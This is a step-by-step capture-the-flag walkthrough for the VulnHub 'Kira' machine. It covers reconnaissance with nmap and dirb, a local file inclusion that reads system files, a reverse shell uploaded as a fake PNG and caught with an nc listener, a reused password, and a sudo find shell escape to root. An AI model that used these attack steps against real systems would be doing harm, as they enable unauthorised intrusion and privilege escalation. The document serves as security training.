Machine Link : https://www.vulnhub.com/entry/kira-ctf,594/ STEP01 arp-scan l FINDING 192.168.31.141 --------------------------------------------------------------------------------------------- STEP02 nmap -sSV -A -Pn -p- 192.168.31.141 FINDING 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) --------------------------------------------------------------------------------------------- STEP03 dirb http://192.168.31.141/ FINDING == DIRECTORY: http://192.168.31.141/uploads/ --------------------------------------------------------------------------------------------- STEP04 http://192.168.31.141/ FINDING PRESS UPLOAD BUTTON UPLOAD A REVERSE SHELL NOT SUCCESSFULL --------------------------------------------------------------------------------------------- STEP05 http://192.168.31.141/ click language button beside upload button press language button url shows -- http://192.168.0.108/language.php?lang=en.php check for LFI -- language.php?lang=../../../../../../etc/password it works --------------------------------------------------------------------------------------------- STEP06 upload a reverse shell as whatever.php.png and check in -- http://192.168.31.141/uploads/ --------------------------------------------------------------------------------------------- STEP07 at this link -- language.php?lang=../../../../../../var/www/html/uploads/whatever.php.png open nc -nvlp 1233 hit the link get the reverse shell --------------------------------------------------------------------------------------------- STEP08 python3 -c import pty; pty.spawn("/bin/bash") cd /var/www/html/supersecret-for-Aziz ls -la FINDING bassam-pass.txt cat bassam-pass.txt FINDING Password123!@# --------------------------------------------------------------------------------------------- STEP09 su bassam pwd : Password123!@# sudo -l FINDING (ALL : ALL) /usr/bin/find --------------------------------------------------------------------------------------------- STEP10 in --- https://gtfobins.github.io/gtfobins/find/#shell find the shell escake of find FINDING find . -exec /bin/sh \; -quit --------------------------------------------------------------------------------------------- STEP11 sudo find . -exec /bin/sh \; -quit whoami root cd /root ls -la FINDING flag.txt cat flag.txt FINDING THM{root-Is_Better-Than_All-of-THEM-31337} ---------------------------------------------------------------------------------------------